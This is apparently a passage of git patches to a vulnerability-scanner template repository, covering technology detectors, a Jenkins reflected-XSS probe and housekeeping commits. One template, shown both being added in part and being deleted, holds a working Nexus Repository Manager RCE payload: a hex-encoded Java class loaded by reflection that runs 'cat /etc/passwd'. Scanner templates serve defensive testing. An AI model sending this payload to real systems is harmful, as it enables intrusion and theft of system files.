60700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; + y=0; z=''; while (y lt x.length()){ z += + c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; + };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); + \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n + 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n + 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat + /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], + "limit": 50, "page": 1}], "method": "previewAssets"} + matchers: + - status: + - 200 + type: status + - part: body + regex: + - 'root:[x*]:0:0:' + type: regex + matchers-condition: and + method: POST + path: + - '{{BaseURL}}/service/extdirect' From 72a2b1ec29a74014747aacab5d914e5a93d7e34a Mon Sep 17 00:00:00 2001 From: Gabriel Geraldino Date: Sun, 30 Aug 2020 15:08:56 -0300 Subject: [PATCH 21/36] Delete CVE-2019-7238.yaml --- cves/CVE-2019-7238.yaml | 33 --------------------------------- 1 file changed, 33 deletions(-) delete mode 100644 cves/CVE-2019-7238.yaml diff --git a/cves/CVE-2019-7238.yaml b/cves/CVE-2019-7238.yaml deleted file mode 100644 index f4621fe67d..0000000000 --- a/cves/CVE-2019-7238.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-7238 -info: - author: geraldino2 - name: Nexus Repository Manager 3 RCE - severity: high -requests: - - body: > - {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": - [{"direction": "ASC", "property": "name"}], "start": 0, "filter": - [{"property": "repositoryName", "value": "*"}, {"property": "expression", - "value": "function(x, y, z, c, integer, defineClass){ - c=1.class.forName('java.lang.Character'); integer=1.class; - x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; - y=0; z=''; while (y lt x.length()){ z += - c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; - };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); - \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n - 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n - 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat - /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], - "limit": 50, "page": 1}], "method": "previewAssets"} - matchers: - - status: - - 200 - type: status - - part: body - regex: - - 'root:[x*]:0:0:' - type: regex - matchers-condition: and - method: POST - path: - - '{{BaseURL}}/service/extdirect' From 42035ee66febc5f7e731ed26951caecff19b8b98 Mon Sep 17 00:00:00 2001 From: un-fmunozs Date: Mon, 31 Aug 2020 00:01:26 -0500 Subject: [PATCH 22/36] Update favicon-detection.yaml --- technologies/favicon-detection.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml index 28ec32ffa5..5afbee4c91 100644 --- a/technologies/favicon-detection.yaml +++ b/technologies/favicon-detection.yaml @@ -14,6 +14,7 @@ info: # 17542,e16377344d2d52a15e735041b3eb2c5a,jenkins # 1150,6d2adf39ca320265830403dfc030033a,liferay # 3638,59a0c7b6e4848ccdabcea0636efda02b,blogger + # 198,c6acedaff906029fc5455d9ec52c7f42,wordpress # 5430,c291c057816f71ce15ba5c496f1a965a,wordpress # 1611,f7e3d97f404e71d302b3239eef48d5f2,gitlab # 6093,88717398db158e3330ce94fc1784e4a7,jira @@ -63,6 +64,10 @@ requests: name: jenkins dsl: - "len(body)==17542 && status_code==200 && (\"23e8c7bd78e8cd826c5a6073b15068b1\" == md5(body))" + - type: dsl + name: wordpress + dsl: + - "len(body)==198 && status_code==200 && (\"c6acedaff906029fc5455d9ec52c7f42\" == md5(body))" - type: dsl name: wordpress dsl: From dfc487caba89e675b1129ec0980c431e85f4be52 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 13:08:04 +0530 Subject: [PATCH 23/36] Update CVE-2020-2140.yaml --- cves/CVE-2020-2140.yaml | 34 +++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/cves/CVE-2020-2140.yaml b/cves/CVE-2020-2140.yaml index 30ce5cd722..f3474eb547 100644 --- a/cves/CVE-2020-2140.yaml +++ b/cves/CVE-2020-2140.yaml @@ -1,22 +1,26 @@ id: CVE-2020-2140 info: author: j3ssie/geraldino2 - description: Jenkin rXSS vulnerability - name: Jenkin Audit XSS + description: Jenkin AuditTrailPlugin rXSS vulnerability + name: Jenkin AuditTrailPlugin XSS severity: medium + description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. + + # Source:- https://nvd.nist.gov/vuln/detail/CVE-2020-2140 + requests: - - matchers: - - status: - - 200 - type: status - - part: body - type: word + - method: GET + path: + - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample" + - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample" + + matchers-condition: and + matchers: + - type: word words: -

sample - matchers-condition: and - method: GET - path: - - >- - {{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample - - >- - {{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j

sample + part: body + + - type: status + status: + - 200 \ No newline at end of file From 1dd5658717c85dbff501e30c9cb4e1cc0591bc3e Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 13:09:38 +0530 Subject: [PATCH 24/36] Update CVE-2020-2140.yaml --- cves/CVE-2020-2140.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/CVE-2020-2140.yaml b/cves/CVE-2020-2140.yaml index f3474eb547..d62112e618 100644 --- a/cves/CVE-2020-2140.yaml +++ b/cves/CVE-2020-2140.yaml @@ -1,7 +1,6 @@ id: CVE-2020-2140 info: author: j3ssie/geraldino2 - description: Jenkin AuditTrailPlugin rXSS vulnerability name: Jenkin AuditTrailPlugin XSS severity: medium description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. From a867f996c5b278808199168c4bc03a664adc87bb Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 13:15:28 +0530 Subject: [PATCH 25/36] moved to correct folder and updated severity --- .../drupal-user-enum-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {vulnerabilities => security-misconfiguration}/drupal-user-enum-redirect.yaml (97%) diff --git a/vulnerabilities/drupal-user-enum-redirect.yaml b/security-misconfiguration/drupal-user-enum-redirect.yaml similarity index 97% rename from vulnerabilities/drupal-user-enum-redirect.yaml rename to security-misconfiguration/drupal-user-enum-redirect.yaml index beb97c91b5..bdf4546bb1 100644 --- a/vulnerabilities/drupal-user-enum-redirect.yaml +++ b/security-misconfiguration/drupal-user-enum-redirect.yaml @@ -3,7 +3,7 @@ id: drupal-user-enum-redirect info: name: Drupal User Enumration [Redirect] author: 0w4ys - severity: low + severity: info requests: - method: GET From c86aff54989cb83893c5c427737a6db063c8a8e4 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 31 Aug 2020 17:35:45 +0700 Subject: [PATCH 26/36] :hammer: Add regex matcher for time_local at body --- files/wordpress-debug-log.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/files/wordpress-debug-log.yaml b/files/wordpress-debug-log.yaml index afa317a2ff..d76ab4b456 100644 --- a/files/wordpress-debug-log.yaml +++ b/files/wordpress-debug-log.yaml @@ -2,14 +2,13 @@ id: wp-debug-log info: name: WordPress debug log - author: geraldino2 + author: geraldino2 & @dwisiswant0 severity: info requests: - method: GET path: - "{{BaseURL}}/wp-content/debug.log" - matchers-condition: and matchers: - type: word @@ -18,7 +17,10 @@ requests: - text/plain part: header condition: or - + - type: regex + regex: + - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP" + part: body - type: status status: - 200 \ No newline at end of file From 99cd7a6b3c5872010d606255a0006eba58baf8c1 Mon Sep 17 00:00:00 2001 From: Casper Guldbech Nielsen Date: Mon, 31 Aug 2020 15:52:36 +0200 Subject: [PATCH 27/36] Included detection of Lotus-Domino server based on Headers Signed-off-by: Casper Guldbech Nielsen --- technologies/lotus-domino-detect.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 technologies/lotus-domino-detect.yaml diff --git a/technologies/lotus-domino-detect.yaml b/technologies/lotus-domino-detect.yaml new file mode 100644 index 0000000000..a923ff8b4c --- /dev/null +++ b/technologies/lotus-domino-detect.yaml @@ -0,0 +1,15 @@ +id: lotus-domino-detect +info: + name: IBM Lotus Domino Detect + author: CasperGN + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/" + matchers: + - type: word + words: + - "Server: Lotus-Domino" + part: header \ No newline at end of file From c833fd9da08efea2edf6bdc86f28ec6ef7ce4888 Mon Sep 17 00:00:00 2001 From: Casper Guldbech Nielsen Date: Mon, 31 Aug 2020 17:25:09 +0200 Subject: [PATCH 28/36] Adding robots.txt as file module Signed-off-by: Casper Guldbech Nielsen --- files/robots.txt.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 files/robots.txt.yaml diff --git a/files/robots.txt.yaml b/files/robots.txt.yaml new file mode 100644 index 0000000000..af3f36625f --- /dev/null +++ b/files/robots.txt.yaml @@ -0,0 +1,18 @@ +id: robots-txt +info: + name: robots.txt file + author: CasperGN + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/robots.txt" + matchers-condition: and + matchers: + - type: word + words: + - "Disallow:" + status: + - 200 + condition: and \ No newline at end of file From 65026f8545feee6ea8bf278a967ffb1ec26003a5 Mon Sep 17 00:00:00 2001 From: Casper Guldbech Nielsen Date: Mon, 31 Aug 2020 17:28:19 +0200 Subject: [PATCH 29/36] renaming to uphold extension Signed-off-by: Casper Guldbech Nielsen --- panels/{traefik-dashboard => traefik-dashboard.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename panels/{traefik-dashboard => traefik-dashboard.yaml} (100%) diff --git a/panels/traefik-dashboard b/panels/traefik-dashboard.yaml similarity index 100% rename from panels/traefik-dashboard rename to panels/traefik-dashboard.yaml From 34d5f1c5866348566507ca3cc492132dcd338f68 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 22:47:14 +0530 Subject: [PATCH 30/36] Update robots.txt.yaml --- files/robots.txt.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/files/robots.txt.yaml b/files/robots.txt.yaml index af3f36625f..16d10baef9 100644 --- a/files/robots.txt.yaml +++ b/files/robots.txt.yaml @@ -13,6 +13,12 @@ requests: - type: word words: - "Disallow:" + + - type: word + words: + - text/plain + part: header + + - type: status status: - - 200 - condition: and \ No newline at end of file + - 200 \ No newline at end of file From 2341811f6576536581c0df9d91868029d39c2c27 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 22:50:06 +0530 Subject: [PATCH 31/36] moving this to tech detect --- technologies/lotus-domino-detect.yaml | 15 --------------- technologies/tech-detect.yaml | 8 +++++++- 2 files changed, 7 insertions(+), 16 deletions(-) delete mode 100644 technologies/lotus-domino-detect.yaml diff --git a/technologies/lotus-domino-detect.yaml b/technologies/lotus-domino-detect.yaml deleted file mode 100644 index a923ff8b4c..0000000000 --- a/technologies/lotus-domino-detect.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: lotus-domino-detect -info: - name: IBM Lotus Domino Detect - author: CasperGN - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers: - - type: word - words: - - "Server: Lotus-Domino" - part: header \ No newline at end of file diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 1d8f68b707..91cf5effe1 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -2688,4 +2688,10 @@ requests: words: - "/etc/clientlibs/" - "/content/dam/" - part: body \ No newline at end of file + part: body + + - type: word + name: lotus-domino + words: + - "Server: Lotus-Domino" + part: header From f70ab2d5c8444a650c8a3478cd77160c3719b0c4 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 23:56:18 +0530 Subject: [PATCH 32/36] Update tech-detect.yaml --- technologies/tech-detect.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml index 91cf5effe1..86b17797a6 100644 --- a/technologies/tech-detect.yaml +++ b/technologies/tech-detect.yaml @@ -2695,3 +2695,23 @@ requests: words: - "Server: Lotus-Domino" part: header + + - type: word + name: mongo-express-web-gui + words: + - "Set-Cookie: mongo-express=" + part: header + + - type: word + name: pf-sense-ui + words: + - "Login to pfSense" + + - type: word + name: weave-scope-dashboard + words: + - "Weave Scope" + - "__WEAVEWORKS_CSRF_TOKEN" + - "__CSRF_TOKEN_PLACEHOLDER__" + condition: and + part: body From 46cf7286226ec43c11d014a2850598f2885ac672 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Mon, 31 Aug 2020 23:57:18 +0530 Subject: [PATCH 33/36] moved this to tech detect --- panels/mongo-express-web-gui.yaml | 16 ---------------- panels/pfsense-web-gui.yaml | 16 ---------------- panels/weave-scope-dashboard-detect.yaml | 20 -------------------- 3 files changed, 52 deletions(-) delete mode 100644 panels/mongo-express-web-gui.yaml delete mode 100644 panels/pfsense-web-gui.yaml delete mode 100644 panels/weave-scope-dashboard-detect.yaml diff --git a/panels/mongo-express-web-gui.yaml b/panels/mongo-express-web-gui.yaml deleted file mode 100644 index 99c78170d1..0000000000 --- a/panels/mongo-express-web-gui.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: mongo-express-web-gui - -info: - name: Mongo Express Web GUI - author: puzzlepeaches - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers: - - type: word - words: - - "Set-Cookie: mongo-express=" - part: header diff --git a/panels/pfsense-web-gui.yaml b/panels/pfsense-web-gui.yaml deleted file mode 100644 index c90408ba49..0000000000 --- a/panels/pfsense-web-gui.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: pfsense-web-gui - -info: - name: pfSense Web GUI - author: ossie - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/" - - matchers: - - type: word - words: - - "Login to pfSense" \ No newline at end of file diff --git a/panels/weave-scope-dashboard-detect.yaml b/panels/weave-scope-dashboard-detect.yaml deleted file mode 100644 index 0b1d93761a..0000000000 --- a/panels/weave-scope-dashboard-detect.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: weave-scope-dashboard-detect - -info: - name: Weave Scope Dashboard - author: e_schultze_ - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "Weave Scope" - - "__WEAVEWORKS_CSRF_TOKEN" - - "__CSRF_TOKEN_PLACEHOLDER__" - condition: and - part: body From 9bf0b6dbafbed08661188f81cd3fb587c448cb60 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Tue, 1 Sep 2020 00:04:29 +0530 Subject: [PATCH 34/36] uniform format --- cves/CVE-2017-9841.yaml | 2 +- cves/CVE-2018-1271.yaml | 2 +- cves/CVE-2019-17382.yaml | 2 +- cves/CVE-2019-3396.yaml | 2 +- cves/CVE-2020-3187.yaml | 2 +- cves/CVE-2020-5405.yaml | 2 +- default-credentials/rabbitmq-default-admin.yaml | 2 +- panels/jmx-console.yaml | 2 +- security-misconfiguration/jira-unauthenticated-user-picker.yaml | 2 +- vulnerabilities/oracle-ebs-bispgraph-file-access.yaml | 2 +- vulnerabilities/wordpress-wordfence-xss.yaml | 2 +- 11 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cves/CVE-2017-9841.yaml b/cves/CVE-2017-9841.yaml index bc13e27620..5ed50dd95b 100644 --- a/cves/CVE-2017-9841.yaml +++ b/cves/CVE-2017-9841.yaml @@ -3,7 +3,7 @@ id: CVE-2017-9841 info: name: CVE-2017-9841 author: Random-Robbie - severity: High + severity: high description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "" - part: body + part: body \ No newline at end of file From d80c30d0d7ab3844064de14cd145637676343ff1 Mon Sep 17 00:00:00 2001 From: bauthard <8293321+bauthard@users.noreply.github.com> Date: Tue, 1 Sep 2020 02:50:59 +0530 Subject: [PATCH 35/36] Update issue templates --- .github/ISSUE_TEMPLATE/submit-template.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .github/ISSUE_TEMPLATE/submit-template.md diff --git a/.github/ISSUE_TEMPLATE/submit-template.md b/.github/ISSUE_TEMPLATE/submit-template.md new file mode 100644 index 0000000000..a682945ed5 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/submit-template.md @@ -0,0 +1,14 @@ +--- +name: Submit Template +about: Submit nuclei template using issue +title: "[nuclei-template] " +labels: '' +assignees: '' + +--- + +**Template Details** + +``` +nuclei template goes here +``` From ca4dbf605b27a452ec46b2d6d3382b5475c4b152 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 1 Sep 2020 09:25:25 +0700 Subject: [PATCH 36/36] :abcd: Justifying id's --- ...ect.yaml => workspaceone-uem-airwatch-dashboard-detect.yaml} | 2 +- technologies/github-enterprise-detect.yaml | 2 +- technologies/gitlab-detect.yaml | 2 +- technologies/jaspersoft-detect.yaml | 2 +- technologies/sap-netweaver-detect.yaml | 2 +- technologies/weblogic-detect.yaml | 2 +- vulnerabilities/discourse-xss.yaml | 2 +- vulnerabilities/ibm-infoprint-directory-traversal.yaml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) rename panels/{workspaceone-uem-airWatch-dashboard-detect.yaml => workspaceone-uem-airwatch-dashboard-detect.yaml} (87%) diff --git a/panels/workspaceone-uem-airWatch-dashboard-detect.yaml b/panels/workspaceone-uem-airwatch-dashboard-detect.yaml similarity index 87% rename from panels/workspaceone-uem-airWatch-dashboard-detect.yaml rename to panels/workspaceone-uem-airwatch-dashboard-detect.yaml index 527f17e11c..382e84d75b 100644 --- a/panels/workspaceone-uem-airWatch-dashboard-detect.yaml +++ b/panels/workspaceone-uem-airwatch-dashboard-detect.yaml @@ -1,4 +1,4 @@ -id: workspaceone-uem-airWatch-dashboard-detect +id: workspaceone-uem-airwatch-dashboard-detect info: name: Workspace ONE Unified Endpoint Management (UEM) AirWatch diff --git a/technologies/github-enterprise-detect.yaml b/technologies/github-enterprise-detect.yaml index 2b6bdf4071..4fe42a8a3a 100644 --- a/technologies/github-enterprise-detect.yaml +++ b/technologies/github-enterprise-detect.yaml @@ -1,4 +1,4 @@ -id: Github-Enterprise-Detect +id: github-enterprise-detect info: name: Detect Github Enterprise 